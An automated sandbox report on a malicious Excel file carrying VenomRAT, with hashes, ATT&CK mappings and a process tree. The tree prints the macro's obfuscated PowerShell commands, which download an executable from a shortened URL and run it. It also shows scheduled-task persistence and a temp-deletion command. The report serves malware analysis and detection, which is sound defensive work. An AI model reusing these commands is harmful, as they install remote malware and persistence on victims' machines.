venomrat | ccf9c52f4542aceff583c50226397e1f31630836f08ab40759e01eeaa5538ef4

Analysis

max time kernel
136s
max time network
133s
platform
windows10_x64
resource
win10v20201028
submitted
11-11-2020 01:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Exploit.Siggen2.64979.12090.18025.xls
Size

75KB
MD5

7ba7817848e5d33a4f5b301b075120d8
SHA1

eacf413cf0b6db5ae2f36149dfd2792812a257f7
SHA256

ccf9c52f4542aceff583c50226397e1f31630836f08ab40759e01eeaa5538ef4
SHA512

06f71b6209b5091f6a16196757b8e3d973872f50d67641dbbd020a500baf19ef8ae018980529a841cb44ba2674e75bd1723605e6ec4a163093523fec389fe8a8

Score

10^/10

venomrat evasion persistence rat rootkit stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cutt.ly/XgX89zi

Signatures

Contains code to disable Windows Defender 2 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral2/memory/4448-36-0x0000000000486BDE-mapping.dmp	disable_win_def
behavioral2/memory/4448-35-0x0000000000400000-0x000000000048C000-memory.dmp	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.exe

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3100	1144	cmd.exe	68
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	492	1144	cmd.exe	68
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2388	1144	cmd.exe	68

VenomRAT
VenomRAT is a modified version of QuasarRAT with some added features, such as rootkit and stealer capabilites.
rat rootkit stealer venomrat

Blacklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
15	3420	powershell.exe
17	3420	powershell.exe

Executes dropped EXE 2 IoCs

Processes:

qc.exechrome inc.exe

pid	Process
4324	qc.exe
4596	chrome inc.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

qc.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\vlc = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\VideoLAN\\vlc.exe\""	qc.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
32	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

Processes:

qc.exe

description	pid	Process	procid_target
PID 4324 set thread context of 4448	4324	qc.exe	90

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exe

pid	Process
4552	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
5028	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid	Process
1144	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeRegAsm.exe

pid	Process
3420	powershell.exe
1124	powershell.exe
3420	powershell.exe
420	powershell.exe
1124	powershell.exe
420	powershell.exe
3420	powershell.exe
420	powershell.exe
1124	powershell.exe
4620	powershell.exe
4620	powershell.exe
4620	powershell.exe
4448	RegAsm.exe
4448	RegAsm.exe
4448	RegAsm.exe
4448	RegAsm.exe
4448	RegAsm.exe
4448	RegAsm.exe
4448	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exeqc.exeRegAsm.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	3420	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	420	powershell.exe
Token: SeDebugPrivilege	4324	qc.exe
Token: SeDebugPrivilege	4448	RegAsm.exe
Token: SeDebugPrivilege	4620	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid	Process
1144	EXCEL.EXE
1144	EXCEL.EXE

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

EXCEL.EXE

pid	Process
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE
1144	EXCEL.EXE

Suspicious use of WriteProcessMemory 50 IoCs

Processes:

EXCEL.EXEcmd.execmd.execmd.exepowershell.exeqc.exeRegAsm.execmd.execmd.exe

description	pid	Process	procid_target
PID 1144 wrote to memory of 3100	1144	EXCEL.EXE	76
PID 1144 wrote to memory of 3100	1144	EXCEL.EXE	76
PID 1144 wrote to memory of 492	1144	EXCEL.EXE	77
PID 1144 wrote to memory of 492	1144	EXCEL.EXE	77
PID 1144 wrote to memory of 2388	1144	EXCEL.EXE	78
PID 1144 wrote to memory of 2388	1144	EXCEL.EXE	78
PID 3100 wrote to memory of 3420	3100	cmd.exe	82
PID 3100 wrote to memory of 3420	3100	cmd.exe	82
PID 492 wrote to memory of 1124	492	cmd.exe	83
PID 492 wrote to memory of 1124	492	cmd.exe	83
PID 2388 wrote to memory of 420	2388	cmd.exe	84
PID 2388 wrote to memory of 420	2388	cmd.exe	84
PID 420 wrote to memory of 4324	420	powershell.exe	89
PID 420 wrote to memory of 4324	420	powershell.exe	89
PID 420 wrote to memory of 4324	420	powershell.exe	89
PID 4324 wrote to memory of 4448	4324	qc.exe	90
PID 4324 wrote to memory of 4448	4324	qc.exe	90
PID 4324 wrote to memory of 4448	4324	qc.exe	90
PID 4324 wrote to memory of 4448	4324	qc.exe	90
PID 4324 wrote to memory of 4448	4324	qc.exe	90
PID 4324 wrote to memory of 4448	4324	qc.exe	90
PID 4324 wrote to memory of 4448	4324	qc.exe	90
PID 4324 wrote to memory of 4448	4324	qc.exe	90
PID 4448 wrote to memory of 4552	4448	RegAsm.exe	91
PID 4448 wrote to memory of 4552	4448	RegAsm.exe	91
PID 4448 wrote to memory of 4552	4448	RegAsm.exe	91
PID 4448 wrote to memory of 4596	4448	RegAsm.exe	93
PID 4448 wrote to memory of 4596	4448	RegAsm.exe	93
PID 4448 wrote to memory of 4596	4448	RegAsm.exe	93
PID 4448 wrote to memory of 4620	4448	RegAsm.exe	95
PID 4448 wrote to memory of 4620	4448	RegAsm.exe	95
PID 4448 wrote to memory of 4620	4448	RegAsm.exe	95
PID 4448 wrote to memory of 4888	4448	RegAsm.exe	97
PID 4448 wrote to memory of 4888	4448	RegAsm.exe	97
PID 4448 wrote to memory of 4888	4448	RegAsm.exe	97
PID 4888 wrote to memory of 4932	4888	cmd.exe	99
PID 4888 wrote to memory of 4932	4888	cmd.exe	99
PID 4888 wrote to memory of 4932	4888	cmd.exe	99
PID 4448 wrote to memory of 4952	4448	RegAsm.exe	100
PID 4448 wrote to memory of 4952	4448	RegAsm.exe	100
PID 4448 wrote to memory of 4952	4448	RegAsm.exe	100
PID 4952 wrote to memory of 5008	4952	cmd.exe	102
PID 4952 wrote to memory of 5008	4952	cmd.exe	102
PID 4952 wrote to memory of 5008	4952	cmd.exe	102
PID 4952 wrote to memory of 5028	4952	cmd.exe	103
PID 4952 wrote to memory of 5028	4952	cmd.exe	103
PID 4952 wrote to memory of 5028	4952	cmd.exe	103
PID 4952 wrote to memory of 5056	4952	cmd.exe	104
PID 4952 wrote to memory of 5056	4952	cmd.exe	104
PID 4952 wrote to memory of 5056	4952	cmd.exe	104

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.64979.12090.18025.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1144
- C:\Windows\SYSTEM32\cmd.exe
  cmd /cpowe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/XgX89zi'),'qc.exe')
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:3100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/XgX89zi'),'qc.exe')
    3⤵
    - Blacklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3420
- C:\Windows\SYSTEM32\cmd.exe
  cmd /cpowe^rshell -w 1 stARt`-slE`Ep 20; Move-Item "qc.exe" -Destination "${enV`:appdata}"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w 1 stARt`-slE`Ep 20; Move-Item "qc.exe" -Destination "${enV`:appdata}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1124
- C:\Windows\SYSTEM32\cmd.exe
  cmd /cpowe^rshell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./qc.exe
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./qc.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:420
  - - C:\Users\Admin\AppData\Roaming\qc.exe
      "C:\Users\Admin\AppData\Roaming\qc.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4324
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4448
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Chrome Startup" /sc ONLOGON /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /rl HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:4552
      - C:\Users\Admin\AppData\Roaming\SubDir\chrome inc.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\chrome inc.exe"
        6⤵
        Executes dropped EXE
        
        PID:4596
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" Get-MpPreference -verbose
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4620
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4888
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\Admin\AppData\Local\Temp\*
        7⤵
        
        PID:4932
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9bqH6ybWB4Ng.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4952
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        7⤵
        Runs ping.exe
        
        PID:5028
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:5056

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
b35c81b90185530c116e245b74fa2a7b

SHA1
9ec3db80d69bc51a822eeb1ebc8df8eab4fd7b6a

SHA256
d4bbe07ea9e4148a6cbc18a722daa292595d0244b409a6d1900405b822daa4f2

SHA512
f99b7a101e2954e5b303823b4ecacd01a392c9121d6564585d18876de8bf8897e50f223a2b661b16d45df15d2cdf1b2aa35e1dc6148e54d9fc9e6d7602ca9e7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

MD5
1efce85e583a7a2f123317a20f889d04

SHA1
60f71aa73ea2e2a48ed1c17e3c6d440abf39c914

SHA256
2b5532a94879134a876b11c188ade1a61deaba6a80fe1f3a3a77cc442f1cca0d

SHA512
45a5cd283e6a6ac34c3d8b1a6d73dc1cf52d8c974cf84624e8e9924eddaf354ccda929bce728b47db2b62175e47bdc3eaca6bc6b84d3565881fa87c50319d24c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
6e803d58f7d31cfd86d82618d92b3fe3

SHA1
986c0cb9bc8a2af5fc339b13192d81e4633294b4

SHA256
5664fc17923259fd61bdcaba5fb41ea848fdf074daee39982a0eafef6d93a277

SHA512
4c489fca7d43bec9a8c0879f5032261a6d803d2ab39fa11050c5e483b28e2d7c04be32873606ebc03a83f33a287932261accedde461553da0d435fc029db4ac4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
eb2c51686c192fa9812f468cf21f6792

SHA1
30ed7df337903931faa6530bbcdf7cf2f1398452

SHA256
7a1274c9ae25c33ea90adb30b86ff12e6324e6af6e0e995e9489e25f7d42174b

SHA512
67cecff7ee01ce35ea2e72471b58da55c7be4ca80aff87a70c0beebc823e9e7e0717efc4a1c62bd37483964549475ad5def2f6892919baba2a6a6dbf4a85b61a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
eb2c51686c192fa9812f468cf21f6792

SHA1
30ed7df337903931faa6530bbcdf7cf2f1398452

SHA256
7a1274c9ae25c33ea90adb30b86ff12e6324e6af6e0e995e9489e25f7d42174b

SHA512
67cecff7ee01ce35ea2e72471b58da55c7be4ca80aff87a70c0beebc823e9e7e0717efc4a1c62bd37483964549475ad5def2f6892919baba2a6a6dbf4a85b61a

Download Submit
C:\Users\Admin\AppData\Local\Temp\9bqH6ybWB4Ng.bat

MD5
9b3bd1a9014ca7596fc693ae98ba356b

SHA1
452903d32b128b2af9173d04b7b139b33c784e38

SHA256
6fb3c73b03fffe88c877e3654156a9bc548e3eccf4bc1c8b06716c642803d3f4

SHA512
629fceac04f941b6a621804829834d958c0dfb5105932087b3622f8b3c9ad1e1e13eefeda893757824688c75db752bb0012e728f194237436897a0ec7fb6fdac

Download Submit
C:\Users\Admin\AppData\Roaming\SubDir\chrome inc.exe

MD5
b58b926c3574d28d5b7fdd2ca3ec30d5

SHA1
d260c4ffd603a9cfc057fcb83d678b1cecdf86f9

SHA256
6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3

SHA512
b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

Download Submit
C:\Users\Admin\AppData\Roaming\SubDir\chrome inc.exe

MD5
b58b926c3574d28d5b7fdd2ca3ec30d5

SHA1
d260c4ffd603a9cfc057fcb83d678b1cecdf86f9

SHA256
6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3

SHA512
b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

Download Submit
C:\Users\Admin\AppData\Roaming\qc.exe

MD5
fe0ba2fceec59d1f2a0b9b8d00c8f701

SHA1
b9e1c29f0cb1b839b98bfb8a3a165024e1dd479e

SHA256
131ae651c75b7deb9739f4e7f8cc4f30d8cb1c279db2c20c51a895eb7d9959fb

SHA512
6f9ca7022a29ec31585daeed1c1a184052479174be52c5c77a28538a59e9bddd45864474c2734530e350f6777d511ab1df5f119632976d87923c14411d51c941

Download Submit
C:\Users\Admin\Documents\qc.exe

MD5
fe0ba2fceec59d1f2a0b9b8d00c8f701

SHA1
b9e1c29f0cb1b839b98bfb8a3a165024e1dd479e

SHA256
131ae651c75b7deb9739f4e7f8cc4f30d8cb1c279db2c20c51a895eb7d9959fb

SHA512
6f9ca7022a29ec31585daeed1c1a184052479174be52c5c77a28538a59e9bddd45864474c2734530e350f6777d511ab1df5f119632976d87923c14411d51c941

Download Submit
memory/420-14-0x00007FFE17250000-0x00007FFE17C3C000-memory.dmp

Filesize
9.9MB

Download
memory/420-12-0x0000000000000000-mapping.dmp

Download
memory/492-6-0x0000000000000000-mapping.dmp

Download
memory/1124-11-0x00007FFE17250000-0x00007FFE17C3C000-memory.dmp

Filesize
9.9MB

Download
memory/1124-9-0x0000000000000000-mapping.dmp

Download
memory/1144-0-0x00007FFE20890000-0x00007FFE20EC7000-memory.dmp

Filesize
6.2MB

Download
memory/1144-3-0x0000014456807000-0x000001445680C000-memory.dmp

Filesize
20KB

Download
memory/1144-2-0x0000014456807000-0x000001445680C000-memory.dmp

Filesize
20KB

Download
memory/1144-1-0x0000014456807000-0x000001445680C000-memory.dmp

Filesize
20KB

Download
memory/2388-7-0x0000000000000000-mapping.dmp

Download
memory/3100-5-0x0000000000000000-mapping.dmp

Download
memory/3420-13-0x000002AD26F50000-0x000002AD26F51000-memory.dmp

Filesize
4KB

Download
memory/3420-17-0x000002AD3F2A0000-0x000002AD3F2A1000-memory.dmp

Filesize
4KB

Download
memory/3420-10-0x00007FFE17250000-0x00007FFE17C3C000-memory.dmp

Filesize
9.9MB

Download
memory/3420-8-0x0000000000000000-mapping.dmp

Download
memory/4324-23-0x0000000000000000-mapping.dmp

Download
memory/4324-31-0x0000000004C00000-0x0000000004C01000-memory.dmp

Filesize
4KB

Download
memory/4324-33-0x0000000006F10000-0x0000000006F11000-memory.dmp

Filesize
4KB

Download
memory/4324-34-0x0000000007590000-0x00000000075A6000-memory.dmp

Filesize
88KB

Download
memory/4324-32-0x0000000006E20000-0x0000000006E9C000-memory.dmp

Filesize
496KB

Download
memory/4324-26-0x0000000073A80000-0x000000007416E000-memory.dmp

Filesize
6.9MB

Download
memory/4324-27-0x0000000000010000-0x0000000000011000-memory.dmp

Filesize
4KB

Download
memory/4324-29-0x0000000005010000-0x0000000005011000-memory.dmp

Filesize
4KB

Download
memory/4324-30-0x0000000004B10000-0x0000000004B11000-memory.dmp

Filesize
4KB

Download
memory/4448-36-0x0000000000486BDE-mapping.dmp

Download
memory/4448-44-0x0000000006AD0000-0x0000000006AD1000-memory.dmp

Filesize
4KB

Download
memory/4448-43-0x0000000006700000-0x0000000006701000-memory.dmp

Filesize
4KB

Download
memory/4448-37-0x0000000073A50000-0x000000007413E000-memory.dmp

Filesize
6.9MB

Download
memory/4448-35-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4552-45-0x0000000000000000-mapping.dmp

Download
memory/4596-50-0x0000000073A50000-0x000000007413E000-memory.dmp

Filesize
6.9MB

Download
memory/4596-46-0x0000000000000000-mapping.dmp

Download
memory/4596-51-0x00000000006A0000-0x00000000006A1000-memory.dmp

Filesize
4KB

Download
memory/4620-73-0x0000000009CA0000-0x0000000009CA1000-memory.dmp

Filesize
4KB

Download
memory/4620-76-0x0000000009C40000-0x0000000009C41000-memory.dmp

Filesize
4KB

Download
memory/4620-56-0x00000000079D0000-0x00000000079D1000-memory.dmp

Filesize
4KB

Download
memory/4620-58-0x0000000008340000-0x0000000008341000-memory.dmp

Filesize
4KB

Download
memory/4620-54-0x0000000007A50000-0x0000000007A51000-memory.dmp

Filesize
4KB

Download
memory/4620-60-0x0000000008180000-0x0000000008181000-memory.dmp

Filesize
4KB

Download
memory/4620-61-0x0000000008A90000-0x0000000008A91000-memory.dmp

Filesize
4KB

Download
memory/4620-62-0x00000000089E0000-0x00000000089E1000-memory.dmp

Filesize
4KB

Download
memory/4620-64-0x0000000009780000-0x00000000097B3000-memory.dmp

Filesize
204KB

Download
memory/4620-71-0x0000000009760000-0x0000000009761000-memory.dmp

Filesize
4KB

Download
memory/4620-72-0x0000000009B40000-0x0000000009B41000-memory.dmp

Filesize
4KB

Download
memory/4620-53-0x0000000004EE0000-0x0000000004EE1000-memory.dmp

Filesize
4KB

Download
memory/4620-74-0x0000000009C50000-0x0000000009C51000-memory.dmp

Filesize
4KB

Download
memory/4620-55-0x0000000007930000-0x0000000007931000-memory.dmp

Filesize
4KB

Download
memory/4620-52-0x0000000073A50000-0x000000007413E000-memory.dmp

Filesize
6.9MB

Download
memory/4620-48-0x0000000000000000-mapping.dmp

Download
memory/4888-78-0x0000000000000000-mapping.dmp

Download
memory/4932-80-0x0000000000000000-mapping.dmp

Download
memory/4932-79-0x0000000000000000-mapping.dmp

Download
memory/4952-81-0x0000000000000000-mapping.dmp

Download
memory/5008-83-0x0000000000000000-mapping.dmp

Download
memory/5028-84-0x0000000000000000-mapping.dmp

Download
memory/5056-85-0x0000000000000000-mapping.dmp

Download
memory/5056-86-0x0000000000000000-mapping.dmp

Download
memory/5056-88-0x0000000073740000-0x0000000073E2E000-memory.dmp

Filesize
6.9MB

Download